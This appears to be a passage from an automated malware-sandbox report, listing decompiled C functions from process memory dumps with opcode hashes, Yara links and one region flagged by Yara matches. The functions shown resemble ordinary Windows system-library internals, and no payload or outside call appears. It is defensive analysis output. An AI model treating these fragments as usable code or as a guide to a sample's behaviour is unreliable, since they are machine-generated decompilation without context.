0x1e43fe9e
0x1e43fea1
0x1e43fead
0x1e43feb3
0x1e43feb9
0x1e43fec3
0x1e43fed5
0x1e43fec5
0x1e43fece
0x1e43fece
0x1e43fee0
0x1e43fee1
0x1e43fee3
0x1e43fee8
0x1e43fefb

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8a1622601d17155a50ea614d2503ba38a46592ba4c475b3d2d89bf238db2aa
Instruction ID: 02f1b7119998e4c64a832f95d4e3195185b3cd8f92e8beddcf09d789d9b8e59e
Opcode Fuzzy Hash: 1c8a1622601d17155a50ea614d2503ba38a46592ba4c475b3d2d89bf238db2aa
Instruction Fuzzy Hash: 57016274A00258AFCB14DFA8D546A6EB7F4FF08304F10469AB955EB382D635E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E478F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1E478F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1e49d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E1E3C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x1e478f6a
0x1e478f79
0x1e478f81
0x1e478f84
0x1e478f8b
0x1e478f91
0x1e478f94
0x1e478f9e
0x1e478fb0
0x1e478fa0
0x1e478fa9
0x1e478fa9
0x1e478fbb
0x1e478fbc
0x1e478fbe
0x1e478fc3
0x1e478fd6

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328c830f776522727184b6c678106f3a27f2a4813ced182747cd044d728e4ef5
Instruction ID: b18b97233bd425e42083be8efa40aaec88250b5e9f69919c2b3cb50cd07a8dc0
Opcode Fuzzy Hash: 328c830f776522727184b6c678106f3a27f2a4813ced182747cd044d728e4ef5
Instruction Fuzzy Hash: 76011974A00258AFDB04DFB8D545AAEBBB4EF48300F50455AB905EB380EA74EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E46131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1E46131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1e49d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E1E3C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x1e46131b
0x1e46132a
0x1e461330
0x1e461336
0x1e46133e
0x1e461341
0x1e461344
0x1e46134f
0x1e461361
0x1e461351
0x1e46135a
0x1e46135a
0x1e46136c
0x1e46136d
0x1e46136f
0x1e461374
0x1e461387

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c6b81e9a28f1bdaa9b38dd8dd3e69f0a033e73a7998dbdf99815b93538f1d2
Instruction ID: 25eb758167528ddf1f287d893506cbb67f461fa4d950de7271277fa0793092ca
Opcode Fuzzy Hash: e8c6b81e9a28f1bdaa9b38dd8dd3e69f0a033e73a7998dbdf99815b93538f1d2
Instruction Fuzzy Hash: 73013CB5A01258AFCB04DFA9D545AAEB7F4FF08700F40455AF845EB391E674EA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E461608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1E461608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x1e49d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E1E3C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x1e461608
0x1e461617
0x1e46161d
0x1e461625
0x1e461628
0x1e46162b
0x1e461636
0x1e461648
0x1e461638
0x1e461641
0x1e461641
0x1e461653
0x1e461654
0x1e461656
0x1e46165b
0x1e46166e

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52fc79246639fee033a3db9ba625d6699f81d1983df87d208a4f6ae08cbc5ae
Instruction ID: 0661de213459d2fb8b4c321924af21b8a3dff3b3ab4dadb5fd0b8892f2cb88e0
Opcode Fuzzy Hash: f52fc79246639fee033a3db9ba625d6699f81d1983df87d208a4f6ae08cbc5ae
Instruction Fuzzy Hash: 72F06275E00258EFCB14DFA9D545A6EB7F4FF58300F44455AE905EB391E634E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E1E3CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1e3811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E1E4788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x1e3cc577
0x1e3cc57d
0x1e3cc581
0x1e3cc5b5
0x1e3cc5b9
0x1e3cc5ce
0x1e3cc5ce
0x1e3cc5ca
0x00000000
0x1e3cc5ca
0x1e3cc5c4
0x1e3cc5c8
0x00000000
0x00000000
0x00000000
0x1e3cc5ad
0x00000000
0x1e3cc5af

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deee3bbc0cff7571c148306f74996947e676fdb8814f76175ccb9a1478b1f09d
Instruction ID: 2353a4fea7ce57fe153442ecde72fbd903e00a1db2576e7998bd2a4af4b02de2
Opcode Fuzzy Hash: deee3bbc0cff7571c148306f74996947e676fdb8814f76175ccb9a1478b1f09d
Instruction Fuzzy Hash: 32F0E2B69256E19FD32DC727C020B027FFA9B09670F918B6BD40687209CBB4DC80C250

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1E3E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E1E3EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E1E3E92C6(_t11, _t14);
				}
				return _t11;
			}

0x1e3e9295
0x1e3e9299
0x1e3e929f
0x1e3e92aa
0x1e3e92ad
0x1e3e92ae
0x1e3e92af
0x1e3e92b0
0x1e3e92b4
0x1e3e92bb
0x1e3e92bb
0x1e3e92c5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 5c13e1c6bfc7e8c50f8a787b5556deb1c77d4ec5c08497bee068eb8d304f6bb0
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 34E022323406806BEB218E0ACC80F0337ADEFC2720F0545B9B9001F282CBF6EC0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E462073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1E462073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E1E45FD22(__ecx);
				_t19 =  *0x1e49849c - _t3; // 0x283e578a
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1e498748; // 0x0
					if(__eflags <= 0) {
						E1E461C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1e498724 & 0x00000004;
							if(( *0x1e498724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1e498724; // 0x0
					return E1E458DF1(__ebx, 0xc0000374, 0x1e495890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x1e462076
0x1e462078
0x1e46207d
0x1e462083
0x1e4620a4
0x1e4620aa
0x1e4620ac
0x1e4620b7
0x1e4620ba
0x1e4620bc
0x1e4620c9
0x1e4620c9
0x1e4620d0
0x1e4620d2
0x00000000
0x1e4620d2
0x1e4620be
0x1e4620c3
0x1e4620c5
0x1e4620c7
0x00000000
0x00000000
0x1e4620c7
0x1e4620bc
0x1e4620d4
0x1e462085
0x1e462085
0x1e4620a3
0x1e4620a3

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c1d0016ae5663ec753168c12e0c9dfe72dfcea776a67709d89778a327e2720
Instruction ID: da93035a28fe21dd379811805773a6e1ef1915d227a2a3f4746ee5a9be752f22
Opcode Fuzzy Hash: 56c1d0016ae5663ec753168c12e0c9dfe72dfcea776a67709d89778a327e2720
Instruction Fuzzy Hash: CDF05C2A4211E59AEF169B3834513C5BFC2EB5D910F090E87D55027309CA39D883CB28

Uniqueness

Uniqueness Score: -1.00%

Function 1E478D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1E478D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1e49d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E1E3C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x1e478d34
0x1e478d43
0x1e478d4b
0x1e478d4e
0x1e478d52
0x1e478d5c
0x1e478d6e
0x1e478d5e
0x1e478d67
0x1e478d67
0x1e478d79
0x1e478d7a
0x1e478d7c
0x1e478d81
0x1e478d94

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646b04c3ed8f87d9837f5fd16d4a584f4154ef62d185d41818a70a3d7f9b25c0
Instruction ID: 275f2c1f14d950018c83de5e7916575587740dfc47b8637dbec71967be4e035a
Opcode Fuzzy Hash: 646b04c3ed8f87d9837f5fd16d4a584f4154ef62d185d41818a70a3d7f9b25c0
Instruction Fuzzy Hash: B8F0B474E04758AFDB14DFB8D545AAEB7B4FF18300F50859AE905EB380DA34E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E1E4788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E1E3CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1e381030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x1e3a4f2e
0x1e3a4f34
0x1e3a4f38
0x1e400b85
0x1e400b85
0x1e400b89
0x1e400b9a
0x1e400b9a
0x1e400b9f
0x00000000
0x1e400b9f
0x1e400b94
0x1e400b98
0x00000000
0x00000000
0x00000000
0x1e400b98
0x1e3a4f3e
0x1e3a4f48
0x00000000
0x1e3a4f6e
0x00000000
0x1e3a4f70

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96217269d446cd4bf1b655978fdfc4721a270fddcc016f62c4c1721e4f2e3b67
Instruction ID: 197e21b8626ac1bcee0ea0f9494d6fc7931c740cd827876c84384c6cf7b44935
Opcode Fuzzy Hash: 96217269d446cd4bf1b655978fdfc4721a270fddcc016f62c4c1721e4f2e3b67
Instruction Fuzzy Hash: 64F0BE36921AD58FD370C798C260B82B7FAAB04774F415B76D80587A25C724EC80C780

Uniqueness

Uniqueness Score: -1.00%

Function 1E478B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1E478B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1e49d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E1E3C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1e478b67
0x1e478b6f
0x1e478b72
0x1e478b7d
0x1e478b8f
0x1e478b7f
0x1e478b88
0x1e478b88
0x1e478b9a
0x1e478b9b
0x1e478b9d
0x1e478ba2
0x1e478bb5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1473100b7b5f218964a858ae078b5ef53f384354dfee3b734b99219d2c7d6b
Instruction ID: ebdda8184ec4eb10bd0accaf24c96584fcf485c0f31ea07b0db07701a0113c98
Opcode Fuzzy Hash: 2e1473100b7b5f218964a858ae078b5ef53f384354dfee3b734b99219d2c7d6b
Instruction Fuzzy Hash: A8F082B4A04268AFDB14DBB8D906E6EB7B4FF08300F440599B905EB381EB74E900C794

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1E3C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E1E3BEB70(__ecx, 0x1e4979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E1E3E95D0();
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x1e3c746d
0x1e3c746d
0x1e3c746d
0x1e3c7471
0x1e3c7488
0x1e40f92d
0x1e3c748e
0x1e3c7491
0x1e3c7495
0x1e40f937
0x1e40f93a
0x1e40f94e
0x1e40f953
0x1e40f956
0x1e40f956
0x1e3c7495
0x00000000
0x1e3c7488
0x1e3c7473
0x1e3c7478
0x1e3c747d
0x1e3c7481
0x00000000
0x1e3c7481
0x1e3c747d
0x1e3c747a
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba626128fd9642ab64b3fdb28e4c3037526ae459bd62226a7ee89ac238496e11
Instruction ID: ee340939d0e5aacbd4cef0076349c349879d46cba826c2ed65b3386766e8c085
Opcode Fuzzy Hash: ba626128fd9642ab64b3fdb28e4c3037526ae459bd62226a7ee89ac238496e11
Instruction Fuzzy Hash: B3F05E39914189AADB038BB9C840BEA7BB7AF04250F040767DC91AB260E765EC41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1E478CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1E478CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1e49d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E1E3C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1e478ce5
0x1e478ced
0x1e478cf0
0x1e478cfb
0x1e478d0d
0x1e478cfd
0x1e478d06
0x1e478d06
0x1e478d18
0x1e478d19
0x1e478d1b
0x1e478d20
0x1e478d33

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d46fcbc3b6bf42b5a3dc1b3bf0b0a89434b79d0f37863769e08e55e9389e5d8
Instruction ID: 04e0b010a785a2179612c0f42bf89c58a8faf4283940ebc88d93becf4d1f8bd5
Opcode Fuzzy Hash: 4d46fcbc3b6bf42b5a3dc1b3bf0b0a89434b79d0f37863769e08e55e9389e5d8
Instruction Fuzzy Hash: 9DF08974D04658AFDB04DBB9D955D9E77B4EF18300F51069AE915EB380EA34ED00C754

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1e497b9c; // 0x0
				_t15 = __ecx;
				_t16 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E1E3EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x1e3da44b
0x1e3da453
0x1e3da472
0x1e3da476
0x00000000
0x1e3da493
0x1e3da47a
0x1e3da47f
0x1e3da486
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1573faa98125748c743abc7715dc48a7a08042f0941485f8105a312a2d0f36
Instruction ID: f963fd417d20f6be3a41ca6bb8a84239619b916c1f28be8fa931f5835311c244
Opcode Fuzzy Hash: dd1573faa98125748c743abc7715dc48a7a08042f0941485f8105a312a2d0f36
Instruction Fuzzy Hash: E1E092B3A05421ABD3128A18EC00F5673ADEBE4655F0A4639E544D7214D668ED16C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1E3AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E1E3DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L1E3C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x1e3af35d
0x1e3af361
0x1e3af367
0x1e3af372
0x1e3af38c
0x1e3af38c
0x1e3af394

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: b4b68ceb91e49e96c33f3befb3a97d662cc6cfe245949c2f2a16ff00a14166ce
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 3EE0D832A40218BBCB2197D99D05F5ABBBDDF84A60F010295BA04D7190D564ED80C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 005639D1, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8c92bcd0a4f2cfc0791b11d65e22c25100e1bdf0f457684288e4d6c8ad322a
Instruction ID: 9c57fb3df00bc8da404c3bcb08f387713f617061369e55bf35ac4b7e3bbfcd9d
Opcode Fuzzy Hash: fc8c92bcd0a4f2cfc0791b11d65e22c25100e1bdf0f457684288e4d6c8ad322a
Instruction Fuzzy Hash: 4BE026757551424BEF51EAA48406B943B60BBD0E447C80498D4809F346E718D986CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1e3811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E1E4788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E1E3C0050(_t14);
				}
			}

0x1e3bff66
0x1e3bff6b
0x00000000
0x1e3bff8f
0x00000000
0x1e3bff8f

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47ace211bca866f02d74eb6b48bbbcfe558928813c0256d911c86a1bd10e3ca
Instruction ID: 70c212150ce86c230547e94470a43687b7083bdef70d8bcebd3e53ea26d243a1
Opcode Fuzzy Hash: d47ace211bca866f02d74eb6b48bbbcfe558928813c0256d911c86a1bd10e3ca
Instruction Fuzzy Hash: 02E0DFB4A152849FD324CB52D890F05779EDF42721F1AE75EE00A4B901C723E8C0C64A

Uniqueness

Uniqueness Score: -1.00%

Function 1E45D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E45D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L1E3AE8B0(__ecx, _a4, 0xfff);
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x1e45d38a
0x1e45d39b
0x1e45d3b1
0x00000000
0x1e45d3b6
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
